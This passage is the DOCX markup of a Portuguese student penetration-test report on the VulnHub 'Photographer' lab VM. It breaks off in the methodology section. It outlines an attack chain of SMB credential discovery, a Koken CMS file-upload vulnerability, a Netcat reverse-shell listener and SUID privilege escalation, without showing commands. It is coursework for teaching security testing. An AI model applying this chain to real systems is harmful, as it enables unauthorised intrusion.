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B468" w14:textId="29587F68" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="65ABA6D0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="052B59C6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="6B1FBD18" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FACULDADE DE TECNOLOGIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA63C74" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CURSO SUPERIOR DE TECNOLOGIA EM ANÁLISE E DESENVOLVIMENTO DE SISTEMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369F5FE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="430F18E5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="353ADA57" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2DD70A95" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2DBDBAD7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>RELATÓRIO DE TESTE DE INTRUSÃO ÉTICO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B5933C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MÁQUINA VIRTUAL PHOTOGRAPHER — VULNHUB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE496C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="6CB3B243" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="44CAA242" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2CBFA9CD" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="4FE1DF8F" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="274A52BC" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="6954AB58" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Felipe Bonfim Pontes — RA: 237023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E3FE2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Cesar Antônio Leite Godinho do Nascimento — RA: 248722</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25B70B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Herick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Marlon da Silva Garcia — RA: 249297</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBD0E1" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="65B8FDD6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="04EEDA21" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="5A32E03B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="6CD112C5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2BC9F984" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Disciplina: Cibersegurança</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7610CB" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Professor: Renato Junior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126F45C4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="51D43A28" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="55C7F516" w14:textId="173182FF" w:rsidR="00DA7219" w:rsidRDefault="00F85848">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Sorocaba — SP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73121DB0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909DAD5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:sectPr w:rsidR="00DA7219">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1CD474" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1 RESUMO EXECUTIVO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F2D06" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Este relatório documenta a execução de um teste de intrusão ético (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) realizado sobre a máquina virtual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, disponibilizada pela plataforma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, em ambiente de laboratório controlado, no contexto da disciplina de Cibersegurança do Curso Superior de Tecnologia em Análise e Desenvolvimento de Sistemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F1292" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O exercício foi realizado em 11 de junho de 2026, com o objetivo didático de identificar vulnerabilidades, explorá-las utilizando ferramentas fornecidas pelo professor e documentar os resultados conforme práticas profissionais de segurança ofensiva. O ambiente consistiu em uma máquina atacante Kali Linux (IP: 192.168.56.101) e a máquina-alvo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (IP: 192.168.56.102), ambas em rede isolada do tipo Host-Only no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8719D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A cadeia de ataque executada comprometeu completamente o sistema-alvo, desde o reconhecimento inicial até a obtenção de privilégios de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>superusuário</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (root), passando por enumeração de serviços, descoberta de credenciais via compartilhamento SMB, exploração de vulnerabilidade de upload arbitrário de arquivo no CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2020-37023) e escalação de privilégios via binário SUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB5033" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="2670AF43" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>2 OBJETIVOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C00650C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O presente trabalho tem como objetivos gerais e específicos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463150AE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Aplicar metodologia estruturada de teste de intrusão em ambiente controlado de laboratório.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0FC73" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Identificar e explorar vulnerabilidades reais utilizando ferramentas de segurança ofensiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411AE6D" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Documentar toda a cadeia de ataque desde o reconhecimento até a pós-exploração.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D861A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Analisar cada vulnerabilidade identificada à luz do OWASP Top 10 2025 e frameworks de gestão de risco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE930C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Propor medidas de mitigação e remediação baseadas em boas práticas reconhecidas internacionalmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C1A04" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Desenvolver competência técnica e ética na atuação como analista de segurança ofensiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCEB916" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="289F4C39" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>3 ESCOPO E AMBIENTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BE846" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Ambiente de Laboratório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4A766F" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O ambiente foi inteiramente virtualizado utilizando o Oracle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, configurado em rede isolada do tipo Host-Only, garantindo que nenhum tráfego malicioso ou exploração atingisse sistemas externos ao laboratório. Essa configuração é condição fundamental para a legalidade e ética do exercício.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE5238" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A máquina atacante utilizada foi o Kali Linux, distribuição Linux especializada em segurança ofensiva, amplamente adotada em ambientes profissionais e educacionais de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. A máquina-alvo foi a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, disponibilizada publicamente pela plataforma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> especificamente para fins de aprendizado e prática de técnicas de intrusão.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189533A5" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Identificação das Máquinas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAF9D0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Máquina atacante: Kali Linux — IP 192.168.56.101, interface eth0, rede Host-Only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E753C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Máquina-alvo: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — IP 192.168.56.102, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PHOTOGRAPHER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19643C04" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Ferramentas Utilizadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F284A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As ferramentas empregadas ao longo do exercício foram previamente indicadas pelo professor e abrangem as principais fases de um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profissional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9979A0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — scanner de portas, serviços e versões.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DBA155" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>enum4linux — enumeração de usuários e compartilhamentos SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8E1D2" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — acesso a compartilhamentos SMB para coleta de arquivos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298BE1A6" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — identificação de tecnologias web e CMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C70A8" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — scanner de vulnerabilidades web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AC54B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — descoberta de diretórios ocultos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FB1D3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — interceptação e manipulação de requisições HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865D4D9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para recepção de reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A389EE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — referência para técnicas de escalação de privilégios via binários SUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF6E78" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="056DA094" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>4 METODOLOGIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5FCF8" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>O teste de intrusão seguiu a metodologia estruturada em fases sequenciais, amplamente adotada em avaliações profissionais de segurança:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6A091" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Reconhecimento e Descoberta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AB8C9" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fase inicial consistiu na identificação do alvo na rede local e no mapeamento dos serviços expostos. Utilizando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> com os parâmetros de detecção de versão e scripts NSE, foi possível obter um inventário completo das portas abertas e dos serviços em execução.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFD640" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Enumeração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B5049" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A enumeração aprofundou as informações coletadas no reconhecimento, investigando cada serviço identificado em busca de configurações inseguras, versões vulneráveis, compartilhamentos expostos e credenciais acessíveis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23BDE4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75387E3C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Com base nas vulnerabilidades identificadas, foram executadas técnicas de exploração para obtenção de acesso inicial ao sistema, utilizando a vulnerabilidade CVE-2020-37023 do CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
